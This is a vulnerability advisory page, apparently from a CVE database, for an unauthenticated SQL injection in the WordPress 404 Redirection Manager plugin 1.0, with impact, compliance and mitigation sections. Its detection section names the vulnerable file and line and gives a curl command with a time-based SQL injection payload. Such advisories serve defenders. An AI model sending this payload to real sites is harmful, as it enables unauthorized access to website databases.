CVE-2016-20071
Received Received - Intake
Unauthenticated SQL Injection in WordPress 404 Redirection Manager Plugin

Publication date: 2026-06-15

Last updated on: 2026-06-15

Assigner: VulnCheck

Description
The 404 Redirection Manager plugin version 1.0 for WordPress contains an unauthenticated SQL injection vulnerability that allows remote attackers to execute arbitrary SQL queries by injecting malicious code through unsanitized user input. Attackers can craft GET requests with SQL injection payloads to manipulate database queries and extract sensitive information from the WordPress database.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-15
Last Modified
2026-06-15
Generated
2026-06-15
AI Q&A
2026-06-15
EPSS Evaluated
N/A
NVD
CVE-2016-20071
EUVD
EUVD-2016-10883
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
404_redirection_manager 404_redirection_manager 1.0
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-89 The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

The 404 Redirection Manager plugin version 1.0 for WordPress contains an unauthenticated SQL injection vulnerability. This means that remote attackers can inject malicious SQL code through unsanitized user input in GET requests without needing to log in or authenticate.

By exploiting this flaw, attackers can execute arbitrary SQL queries on the WordPress database, allowing them to manipulate database operations and potentially extract sensitive information.

The vulnerability is due to improper input sanitization in the plugin's code, specifically in the file custom/lib/cf.SR_redirect_manager.class.php on line 356.

Impact Analysis

This vulnerability can have serious impacts including unauthorized access to sensitive data stored in the WordPress database.

Attackers can manipulate database queries, which may lead to data leakage, data corruption, or unauthorized disclosure of confidential information.

Since the vulnerability is unauthenticated and remotely exploitable, it poses a high risk to affected websites, potentially compromising the integrity and confidentiality of the site’s data.

Detection Guidance

This vulnerability can be detected by sending crafted GET requests containing SQL injection payloads to the vulnerable WordPress 404 Redirection Manager plugin endpoints and observing the responses.

A common detection method is to use time-based SQL injection techniques, such as injecting a payload that causes a delay (e.g., using the SQL sleep function) to confirm the presence of the vulnerability.

For example, you can use curl commands to send malicious GET requests targeting the vulnerable file (custom/lib/cf.SR_redirect_manager.class.php) at the vulnerable line, including payloads that trigger a time delay.

  • curl "http://targetsite.com/path_to_plugin_endpoint?param=1' AND SLEEP(5)-- "
  • Observe if the response time is significantly delayed, indicating a successful SQL injection.

This method does not require authentication and can be automated to scan for the vulnerability.

Mitigation Strategies

Immediate mitigation steps include removing or disabling the vulnerable 404 Redirection Manager plugin version 1.0 from your WordPress installation.

Since the plugin has been permanently closed and is no longer maintained, updating to a patched version is not possible.

Additional mitigation measures include restricting access to the plugin's endpoints via web application firewall (WAF) rules or other network-level controls to block malicious GET requests containing SQL injection payloads.

Monitoring logs for suspicious GET requests targeting the plugin can help detect exploitation attempts.

Consider replacing the plugin with a maintained and secure alternative for managing 404 errors and redirections.

Compliance Impact

The vulnerability allows remote attackers to execute arbitrary SQL queries and extract sensitive information from the WordPress database by exploiting an unauthenticated SQL injection flaw.

Such unauthorized access and potential data extraction could lead to violations of data protection regulations like GDPR and HIPAA, which require safeguarding sensitive personal and health information against unauthorized access and breaches.

Therefore, exploitation of this vulnerability could compromise compliance with these standards by exposing sensitive data and failing to maintain adequate security controls.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2016-20071. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart